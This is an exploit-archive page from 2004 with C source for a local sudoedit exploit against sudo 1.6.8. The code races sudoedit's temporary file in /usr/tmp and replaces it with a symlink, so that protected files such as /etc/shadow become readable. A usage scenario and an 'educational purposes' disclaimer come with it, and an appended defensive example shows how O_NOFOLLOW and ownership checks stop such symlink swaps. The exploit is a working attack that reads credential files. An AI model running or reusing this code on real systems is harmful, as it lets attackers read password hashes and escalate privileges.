Sudo Local Exploit
Source: www.rosiello.org Author: Angelo Published: 2004-09-22


/*

Copyright © Rosiello Security 2004
http://www.rosiello.org

sudoedit Exploit


SOFTWARE : sudoedit
REFERENCE: http://www.sudo.ws/sudo/alerts/sudoedit.html
DATE: 18/09/2004

Summary:
A flaw exists in sudo's -u option (aka sudoedit)
in sudo version 1.6.8 that can give an attacker
read permission to a file that would otherwise be
unreadable.

Sudo versions affected:
1.6.8 only

Credit:
Reznic Valery discovered the problem.

-----------------------------------------------------------

All the information that you can find in this software
was published for educational and didactic purposes only.
The author published this program under the condition
that it is not the intention of the reader to use it
in order to bring to himself or others a profit or to bring
to others damage.

!Respect the law!

How do I use this code ?

To exploit sudoedit you have to open the file
"rosiello" with it, as shown in the example.

EXAMPLE SCENARIO:

1) Open two shells (i) and (ii);
2) (i)$sudoedit rosiello;
3) (ii)$./sudoedit-exploit /etc/shadow;
4) (i) close sudoedit.

The file "rosiello" is now a copy of "/etc/shadow".

AUTHOR : Angelo Rosiello
CONTACT: angelo rosiello org

*/

#include <stdio.h>
#include <string.h>
#include <dirent.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/wait.h>


int main( int argc, char *argv[] )
{
    char PATH[] = "/usr/tmp";   /* directory holding sudoedit's temporary copy */
    char file[64];              /* PATH + '/' + name (at most 24 chars) + NUL */
    DIR *tmp;
    struct dirent *de;
    int found = 0;
    pid_t pid;

    printf( "Copyright © Rosiello Security 2004\n" );
    printf( "http://www.rosiello.org\n" );

    if( argc != 2 )
    {
        printf( "USAGE: %s file\n", argv[0] );
        return( 0 );
    }

    tmp = opendir( PATH );
    if( tmp == NULL )
    {
        perror( PATH );
        return( 1 );
    }

    /* look for the temporary copy that sudoedit made of "rosiello" */
    while( (de = readdir( tmp )) != NULL )
    {
        if( strstr( de->d_name, "rosiello" ) != NULL )
        {
            if( strlen( de->d_name ) > 24 )
            {
                closedir( tmp );
                return( 0 );
            }
            snprintf( file, sizeof(file), "%s/%s", PATH, de->d_name );
            remove( file );

            /* the child replaces the copy with a symlink to argv[1];
               the parent waits for it to finish */
            pid = fork();
            if( pid == 0 )
            {
                execl( "/bin/ln", "ln", "-s", argv[1], file, (char *)NULL );
                _exit( 1 );     /* only reached if execl failed */
            }
            wait( NULL );
            printf( "Now you can close sudoedit and reopen rosiello!\n" );
            found = 1;
            break;
        }
    }
    closedir( tmp );

    if( !found )
        printf( "File Not Found!\n" );
    return( 0 );
}
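
A defensive counterpart to the listing above, added here as an example (it is not part of the original page, and it is neither sudo's code nor its actual fix): a privileged helper that reopens a user-writable temporary copy can refuse the swapped file by opening it with O_NOFOLLOW and checking that it is a regular file owned by the invoking user. The names reopen_temp and demo and the /tmp/reopen-demo-XXXXXX directory are assumptions made for the illustration.

```c
#define _XOPEN_SOURCE 700
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Reopen the temporary copy at `path` before copying it back. Accept it only
 * if the final path component is not a symlink and the opened object is a
 * regular file owned by `owner` (the invoking user). Returns an fd or -1. */
int reopen_temp(const char *path, uid_t owner)
{
    struct stat st;
    /* O_NOFOLLOW: fail on a symlink; O_NONBLOCK: never hang on a FIFO. */
    int fd = open(path, O_RDONLY | O_NOFOLLOW | O_NONBLOCK);
    if (fd < 0)
        return -1;
    /* fstat() on the descriptor checks the object actually opened. */
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode) || st.st_uid != owner) {
        close(fd);
        return -1;
    }
    return fd;
}

/* Constructed scenario in a private directory: create the temp copy,
 * optionally replace it with a symlink to another file (the swap from the
 * page's example scenario), then reopen it.
 * Returns 1 if accepted, 0 if refused, -1 on setup error. */
int demo(int swap_for_symlink, uid_t owner)
{
    char dir[] = "/tmp/reopen-demo-XXXXXX", tmp[64], other[64];
    int fd, accepted;

    if (mkdtemp(dir) == NULL)
        return -1;
    snprintf(tmp, sizeof tmp, "%s/rosiello", dir);
    snprintf(other, sizeof other, "%s/other", dir);
    if ((fd = open(tmp, O_CREAT | O_EXCL | O_WRONLY, 0600)) < 0) return -1;
    close(fd);
    if ((fd = open(other, O_CREAT | O_EXCL | O_WRONLY, 0600)) < 0) return -1;
    close(fd);
    if (swap_for_symlink && (unlink(tmp) != 0 || symlink(other, tmp) != 0))
        return -1;
    fd = reopen_temp(tmp, owner);
    accepted = (fd >= 0);
    if (accepted)
        close(fd);
    unlink(tmp); unlink(other); rmdir(dir);
    return accepted;
}
```

O_NOFOLLOW only guards the last path component, so the directory that holds the temporary copy still has to be one the user cannot rename or replace.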



 